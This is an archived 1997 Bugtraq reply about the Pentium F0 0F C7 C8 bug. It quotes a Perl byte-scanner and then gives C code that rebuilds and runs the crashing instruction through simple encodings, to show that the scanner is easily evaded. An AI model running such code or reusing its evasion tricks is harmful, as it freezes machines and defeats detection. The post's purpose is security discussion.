OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 4th quarter (Oct-Dec) 1997: Re: Intel Pentium Bug

Re: Intel Pentium Bug

Kragen \ (kragenDNACO.NET)
Mon, 10 Nov 1997 07:35:16 -0500

On Sun, 9 Nov 1997, Jason Parsons wrote:
> Re the F0 0F C7 C8 Pentuim bug:
>
> I just wanted ot repost this from the Linux-security list.  Thought it
> might be helpful to some here.  This was posted to Linux-security by Sam
> Trenholme <setreality.samiam.org>.
>         if($data =~ /\xf0\x0f\xc7\xc8/) {
>           print "$dir/$file contains F0 0F C7 C8\n";
>           }

Is this intended to keep malicious people from crashing your computer?

It is trivial to defeat this, and it is impossible, in the general case,
to determine whether or not a program can compute f0 0f c7 c8 and execute
it.

Here are some trivial examples of ways to defeat it:

/*
 * Demonstrate a trivial way to crash a Pentium, f0 0f c7 c8
 */

#include <string.h>


char incr[] = "\xf1\x10\xc8\xc9";
void
fix_incr (char *s) {
        for (; *s; s++) --*s;
}


char backwards[] = "\xc8\xc7\x0f\xf0";

void
reverse_inner(char *begin, char *end) {
        while (end > begin) {
                char t = *end;
                *end = *begin;
                *begin = t;
                end--;
                begin++;
        }
}

void
reverse(char *s) {
        reverse_inner(s, s+strlen(s)-1);
}

char xored[] = "\xf1\x0e\xc9\xc8";
void
xor_pad (char *s, char pad) {
        for (; *s; s++) *s ^= pad;
}

char interleaved[] = { 'X', '\xf0', 'Y', '\x0f', 'Z', '\xc7', 'A', '\xc8',
'\0'};
void
deinterleave (char *s) {
        char *t = s + 1;
        for (; *t; t++, t++, s++) *s = *t;
}

int
main() {
        void (*f)();

        fix_incr(incr);

        reverse(backwards);

        xor_pad(xored, 1);

        deinterleave(interleaved);

        f = incr;  /* or backwards, or xored, or interleaved */
        (*f)();
}


Now, none of these are very subtle.  I could easily write something that
contained a piece of nonsense text, took the second-to-last bit from each
character, and assembled f1 0e c9 c8 from it.  The possibilities are
endless.

A trusted-compiler system seems to be the only possible software
protection against attacks like these.

Kragen